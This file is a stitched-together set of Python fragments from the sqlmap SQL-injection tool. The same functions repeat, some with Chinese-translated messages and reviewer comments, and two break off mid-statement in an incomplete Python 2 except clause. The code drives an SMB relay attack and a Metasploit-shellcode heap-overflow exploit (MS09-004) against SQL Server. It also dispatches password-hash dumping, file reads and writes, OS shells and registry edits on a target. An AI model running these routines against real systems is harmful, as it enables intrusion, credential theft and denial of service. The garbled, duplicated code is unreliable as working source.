def osSmb(self):
    """Check the preconditions for the SMB relay routine, then hand off to self.smb().

    Raises SqlmapUnsupportedDBMSException when the back-end OS is not
    Windows, or when neither stacked queries nor a direct connection is
    available on PostgreSQL / Microsoft SQL Server.  On MySQL without
    stacked queries the routine proceeds via inference (blind) injection
    and says so at debug level.  A warning about the likely outcome is
    logged for the service-account situations described inline.
    """
    self.checkDbmsOs()

    if not Backend.isOs(OS.WINDOWS):
        raise SqlmapUnsupportedDBMSException(
            "the back-end DBMS underlying operating system is "
            "not Windows: it is not possible to perform the SMB "
            "relay attack"
        )

    noStacking = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct
    if noStacking:
        if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
            raise SqlmapUnsupportedDBMSException(
                "on this back-end DBMS it is only possible to "
                "perform the SMB relay attack if stacked "
                "queries are supported"
            )
        if Backend.isDbms(DBMS.MYSQL):
            logger.debug(
                "since stacked queries are not supported, "
                "sqlmap is going to perform the SMB relay "
                "attack via inference blind SQL injection"
            )

    # Reason the relay is unlikely to succeed for the DBMS's default
    # service account; None means no warning is emitted.
    reason = None
    if Backend.isDbms(DBMS.MYSQL):
        reason = (
            "because by default MySQL on Windows runs as "
            "Local System which is not a real user, it does "
            "not send the NTLM session hash when connecting to "
            "a SMB service"
        )
    elif Backend.isDbms(DBMS.PGSQL):
        reason = (
            "because by default PostgreSQL on Windows runs "
            "as postgres user which is a real user of the "
            "system, but not within the Administrators group"
        )
    elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
        reason = (
            "because often Microsoft SQL Server %s " % Backend.getVersion()
            + "runs as Network Service which is not a real user, "
            "it does not send the NTLM session hash when "
            "connecting to a SMB service"
        )

    if reason is not None:
        logger.warn("it is unlikely that this attack will be successful " + reason)

    self.smb()
def osBof(self):
    """Run the MS09-004 'sp_replwritetovarbin' heap-overflow routine after confirmation.

    Returns silently when neither stacked queries nor a direct connection
    is available.  Raises SqlmapUnsupportedDBMSException unless the
    back-end is Microsoft SQL Server 2000 or 2005.  Because the routine
    is likely to crash (DoS) the DBMS process, the user must answer 'y'
    to the prompt; the default answer is 'N' and does nothing.
    """
    if not isStackingAvailable() and not conf.direct:
        return

    supportedTarget = Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2000", "2005"))
    if not supportedTarget:
        raise SqlmapUnsupportedDBMSException(
            "the back-end DBMS must be Microsoft SQL Server "
            "2000 or 2005 to be able to exploit the heap-based "
            "buffer overflow in the 'sp_replwritetovarbin' "
            "stored procedure (MS09-004)"
        )

    logger.info(
        "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
        + "'sp_replwritetovarbin' stored procedure heap-based "
        "buffer overflow (MS09-004)"
    )

    prompt = (
        "this technique is likely to DoS the DBMS process, are you "
        "sure that you want to carry with the exploit? [y/N] "
    )
    answer = readInput(prompt, default="N")
    # Only an explicit leading 'y'/'Y' counts as consent
    confirmed = bool(answer) and answer[0].lower() == "y"

    if confirmed:
        self.initEnv(mandatory=False, detailed=True)
        self.getRemoteTempPath()
        self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
        self.bof()
def action():
    """
    Exploit the SQL injection on the affected URL parameter and extract the
    requested data from the back-end database management system or, where
    possible, its operating system.

    Raises SqlmapUnsupportedDBMSException when the back-end DBMS could not
    be fingerprinted (or no DBMS handler is set), with a hint derived from
    the HTML error page or from the active connection-optimization switch.
    """
    # First of all we have to identify the back-end database management
    # system to be able to go ahead with the injection
    setHandler()

    if not Backend.getDbms() or not conf.dbmsHandler:
        htmlParsed = Format.getErrorParsedDBMSes()
        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"

        # The HTML error page may still name the DBMS even though the
        # fingerprint failed; report it so the user can act on it
        if htmlParsed:
            errMsg += ", but from the HTML error page it was "
            errMsg += "possible to determinate that the "
            errMsg += "back-end DBMS is %s" % htmlParsed

        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")

        raise SqlmapUnsupportedDBMSException(errMsg)

    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())

    # Enumeration options: each flag dispatches to the DBMS handler and
    # hands the result to the dumper
    if conf.getBanner:
        conf.dumper.banner(conf.dbmsHandler.getBanner())

    if conf.getCurrentUser:
        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())

    if conf.getCurrentDb:
        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())

    if conf.getHostname:
        conf.dumper.hostname(conf.dbmsHandler.getHostname())

    if conf.isDba:
        conf.dumper.dba(conf.dbmsHandler.isDba())

    if conf.getUsers:
        conf.dumper.users(conf.dbmsHandler.getUsers())

    if conf.getPasswordHashes:
        try:
            conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
        # NOTE(review): "except X, ex" is Python 2-only syntax; Python 3
        # spells it "except X as ex"
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
        # NOTE(review): the excerpt ends here; the body of this bare
        # except clause and the remaining option handlers are not
        # visible in this chunk.
def _regInit(self):
    """Prepare the session for the Windows registry routines.

    Returns silently when neither stacked queries nor a direct connection
    is available.  Raises SqlmapUnsupportedDBMSException when the back-end
    OS is not Windows.  Otherwise initializes the environment and resolves
    the remote temporary path.
    """
    stackingPossible = isStackingAvailable() or conf.direct
    if not stackingPossible:
        return

    self.checkDbmsOs()
    if not Backend.isOs(OS.WINDOWS):
        raise SqlmapUnsupportedDBMSException("后端DBMS底层操作系统不是Windows")

    self.initEnv()
    self.getRemoteTempPath()
def _regInit(self):
    """Prepare the session for the Windows registry routines.

    Does nothing unless stacked queries or a direct connection are
    available.  Raises SqlmapUnsupportedDBMSException when the back-end
    OS is not Windows; otherwise initializes the environment and resolves
    the remote temporary path.
    """
    if not (isStackingAvailable() or conf.direct):
        return

    self.checkDbmsOs()

    if not Backend.isOs(OS.WINDOWS):
        raise SqlmapUnsupportedDBMSException(
            "the back-end DBMS underlying operating system is "
            "not Windows"
        )

    self.initEnv()
    self.getRemoteTempPath()
def osSmb(self):
    """Check the preconditions for the SMB relay routine, then hand off to self.smb().

    Raises SqlmapUnsupportedDBMSException when the back-end OS is not
    Windows, or when neither stacked queries nor a direct connection is
    available on PostgreSQL / Microsoft SQL Server.  On MySQL without
    stacked queries the routine proceeds via inference (blind) injection
    and says so at debug level.  A warning about the likely outcome is
    logged for the service-account situations described in the messages.
    """
    self.checkDbmsOs()

    if not Backend.isOs(OS.WINDOWS):
        raise SqlmapUnsupportedDBMSException("后端DBMS底层操作系统不是Windows:不可能执行SMB中继攻击")

    noStacking = not isStackingAvailable() and not conf.direct
    if noStacking:
        if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
            raise SqlmapUnsupportedDBMSException("在这个后端DBMS中,只有支持堆叠(多语句)查询才可能执行SMB中继攻击")
        if Backend.isDbms(DBMS.MYSQL):
            logger.debug("由于不支持堆叠查询,sqlmap将通过推测SQL盲注入执行SMB中继攻击")

    # Reason the relay is unlikely to succeed for the DBMS's default
    # service account; None means no warning is emitted.
    reason = None
    if Backend.isDbms(DBMS.MYSQL):
        reason = "因为默认情况下,MySQL在Windows上运行的本地系统不是真正的用户,它在连接到SMB服务时不会发送NTLM会话哈希session hash"
    elif Backend.isDbms(DBMS.PGSQL):
        reason = "因为默认情况下PostgreSQL作为postgres用户运行,该用户是系统的真正用户,但不在Administrators组内"
    elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
        reason = "因为通常Microsoft SQL Server %s 作为网络服务运行,而不是真正的用户,它在连接到SMB服务时不发送NTLM会话哈希" % Backend.getVersion()

    if reason is not None:
        logger.warn("这次攻击不太可能成功 " + reason)

    self.smb()
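def osBof(self):
    """Run the MS09-004 'sp_replwritetovarbin' heap-overflow routine after confirmation.

    Returns silently when neither stacked queries nor a direct connection
    is available.  Raises SqlmapUnsupportedDBMSException unless the
    back-end is Microsoft SQL Server 2000 or 2005.  Because the routine
    is likely to crash (DoS) the DBMS process, the user must confirm at
    the prompt (default: no) before anything is sent.

    Fix: the info message carries a "%s" placeholder for the server
    version that was never substituted, so the log showed a literal
    "%s"; it is now formatted with Backend.getVersion().
    """
    if not isStackingAvailable() and not conf.direct:
        return

    if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
        errMsg = "后端DBMS必须是Microsoft SQL Server 2000或2005才能够利用“sp_replwritetovarbin”存储过程(MS09-004)中基于堆的缓冲区溢出"
        raise SqlmapUnsupportedDBMSException(errMsg)

    # The version placeholder must be filled in, otherwise "%s" is logged verbatim
    infoMsg = "将利用Microsoft SQL Server %s“sp_replwritetovarbin”存储过程基于堆的缓冲区溢出(MS09-004)" % Backend.getVersion()
    logger.info(infoMsg)

    msg = "这种技术很可能是DoS的DBMS过程,你确定要利用这个漏洞? [y/N] "

    # boolean=True makes readInput return a bool; the default of 'N' means
    # that simply pressing enter declines
    if readInput(msg, default='N', boolean=True):
        self.initEnv(mandatory=False, detailed=True)
        self.getRemoteTempPath()
        self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
        self.bof()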
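def _reportNoneData(step):
    """Run *step* (a zero-argument callable), reporting a "no data" outcome.

    A SqlmapNoneDataException is logged at critical level so the run can
    continue with the next option; every other exception propagates.
    """
    try:
        step()
    except SqlmapNoneDataException as ex:
        logger.critical(ex)


def action():
    """
    Exploit the SQL injection on the affected URL parameter and extract the
    data requested through the configured options from the back-end
    database management system or, where possible, its operating system.

    Raises SqlmapUnsupportedDBMSException when the back-end DBMS could not
    be fingerprinted (or no DBMS handler is set), with a hint derived from
    the HTML error page or from the active connection-optimization switch.

    The repeated ``try/except SqlmapNoneDataException ... except: raise``
    blocks of the original are folded into _reportNoneData; the bare
    ``except: raise`` clauses were no-ops and are dropped.
    """
    # The back-end DBMS must be identified before any option can run
    setHandler()

    if not Backend.getDbms() or not conf.dbmsHandler:
        htmlParsed = Format.getErrorParsedDBMSes()
        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"

        # The HTML error page may still name the DBMS even though the
        # fingerprint failed; report it so the user can act on it
        if htmlParsed:
            errMsg += ", but from the HTML error page it was "
            errMsg += "possible to determinate that the "
            errMsg += "back-end DBMS is %s" % htmlParsed

        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")

        raise SqlmapUnsupportedDBMSException(errMsg)

    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())

    # Enumeration options: each flag dispatches to the DBMS handler and
    # hands the result to the dumper
    if conf.getBanner:
        conf.dumper.banner(conf.dbmsHandler.getBanner())

    if conf.getCurrentUser:
        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())

    if conf.getCurrentDb:
        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())

    if conf.getHostname:
        conf.dumper.hostname(conf.dbmsHandler.getHostname())

    if conf.isDba:
        conf.dumper.dba(conf.dbmsHandler.isDba())

    if conf.getUsers:
        conf.dumper.users(conf.dbmsHandler.getUsers())

    if conf.getStatements:
        conf.dumper.statements(conf.dbmsHandler.getStatements())

    # The options below may legitimately yield nothing; a "no data" result
    # is reported and the run goes on with the next option
    if conf.getPasswordHashes:
        _reportNoneData(lambda: conf.dumper.userSettings(
            "database management system users password hashes",
            conf.dbmsHandler.getPasswordHashes(),
            "password hash",
            CONTENT_TYPE.PASSWORDS
        ))

    if conf.getPrivileges:
        _reportNoneData(lambda: conf.dumper.userSettings(
            "database management system users privileges",
            conf.dbmsHandler.getPrivileges(),
            "privilege",
            CONTENT_TYPE.PRIVILEGES
        ))

    if conf.getRoles:
        _reportNoneData(lambda: conf.dumper.userSettings(
            "database management system users roles",
            conf.dbmsHandler.getRoles(),
            "role",
            CONTENT_TYPE.ROLES
        ))

    if conf.getDbs:
        _reportNoneData(lambda: conf.dumper.dbs(conf.dbmsHandler.getDbs()))

    if conf.getTables:
        _reportNoneData(lambda: conf.dumper.dbTables(conf.dbmsHandler.getTables()))

    if conf.commonTables:
        _reportNoneData(lambda: conf.dumper.dbTables(tableExists(paths.COMMON_TABLES)))

    if conf.getSchema:
        _reportNoneData(lambda: conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA))

    if conf.getColumns:
        _reportNoneData(lambda: conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS))

    if conf.getCount:
        _reportNoneData(lambda: conf.dumper.dbTablesCount(conf.dbmsHandler.getCount()))

    if conf.commonColumns:
        _reportNoneData(lambda: conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS)))

    if conf.dumpTable:
        _reportNoneData(conf.dbmsHandler.dumpTable)

    if conf.dumpAll:
        _reportNoneData(conf.dbmsHandler.dumpAll)

    if conf.search:
        _reportNoneData(conf.dbmsHandler.search)

    # User-supplied SQL: one statement per ';'-separated chunk, blanks skipped
    if conf.sqlQuery:
        for query in conf.sqlQuery.strip(';').split(';'):
            query = query.strip()

            if query:
                conf.dumper.sqlQuery(query, conf.dbmsHandler.sqlQuery(query))

    if conf.sqlShell:
        conf.dbmsHandler.sqlShell()

    if conf.sqlFile:
        conf.dbmsHandler.sqlFile()

    # User-defined function options
    if conf.udfInject:
        conf.dbmsHandler.udfInjectCustom()

    # File system options
    if conf.fileRead:
        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))

    if conf.fileWrite:
        conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)

    if conf.commonFiles:
        _reportNoneData(lambda: conf.dumper.rFile(fileExists(paths.COMMON_FILES)))

    # Operating system options: delegated entirely to the DBMS handler,
    # which enforces its own preconditions
    if conf.osCmd:
        conf.dbmsHandler.osCmd()

    if conf.osShell:
        conf.dbmsHandler.osShell()

    if conf.osPwn:
        conf.dbmsHandler.osPwn()

    if conf.osSmb:
        conf.dbmsHandler.osSmb()

    if conf.osBof:
        conf.dbmsHandler.osBof()

    # Windows registry options
    if conf.regRead:
        conf.dumper.registerValue(conf.dbmsHandler.regRead())

    if conf.regAdd:
        conf.dbmsHandler.regAdd()

    if conf.regDel:
        conf.dbmsHandler.regDel()

    # Miscellaneous options
    if conf.cleanup:
        conf.dbmsHandler.cleanup()

    # A direct DBMS connection is closed explicitly at the end of the run
    if conf.direct:
        conf.dbmsConnector.close()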
def action():
    """
    Exploit the SQL injection on the affected URL parameter and extract the
    requested data from the back-end database management system or, where
    possible, its operating system.

    Raises SqlmapUnsupportedDBMSException when the back-end DBMS could not
    be fingerprinted (or no DBMS handler is set), with a hint derived from
    the HTML error page or from the active connection-optimization switch.
    """
    # action() is a central function: it dispatches on the command-line
    # options chosen by the operator and uses the injectable URL to
    # retrieve the requested data (e.g. the current database user, an
    # enumeration of all tables).

    # First of all we have to identify the back-end database management
    # system to be able to go ahead with the injection
    setHandler()  # detects the back-end DBMS of the target web application

    if not Backend.getDbms() or not conf.dbmsHandler:
        htmlParsed = Format.getErrorParsedDBMSes()
        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"  # fingerprinting failed

        # ...but the HTML error page may still have identified the DBMS
        if htmlParsed:
            errMsg += ", but from the HTML error page it was "
            errMsg += "possible to determinate that the "
            errMsg += "back-end DBMS is %s" % htmlParsed

        # do not set the DBMS manually; sqlmap fingerprints it itself
        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
        # try again without the optimization switch
        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
        # support for this DBMS is planned
        else:
            errMsg += ". Support for this DBMS will be implemented at "
            errMsg += "some point"

        raise SqlmapUnsupportedDBMSException(errMsg)

    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())

    # Enumeration options: each flag dispatches to the DBMS handler and
    # hands the result to the dumper
    if conf.getBanner:
        conf.dumper.banner(conf.dbmsHandler.getBanner())

    if conf.getCurrentUser:
        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())

    if conf.getCurrentDb:
        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())

    if conf.getHostname:
        conf.dumper.hostname(conf.dbmsHandler.getHostname())

    if conf.isDba:
        conf.dumper.dba(conf.dbmsHandler.isDba())

    if conf.getUsers:
        conf.dumper.users(conf.dbmsHandler.getUsers())

    if conf.getPasswordHashes:
        try:
            conf.dumper.userSettings(
                "database management system users password hashes",
                conf.dbmsHandler.getPasswordHashes(),
                "password hash",
                CONTENT_TYPE.PASSWORDS)
        # NOTE(review): "except X, ex" is Python 2-only syntax; Python 3
        # spells it "except X as ex"
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
        # NOTE(review): the excerpt ends here; the body of this bare
        # except clause and the remaining option handlers are not
        # visible in this chunk.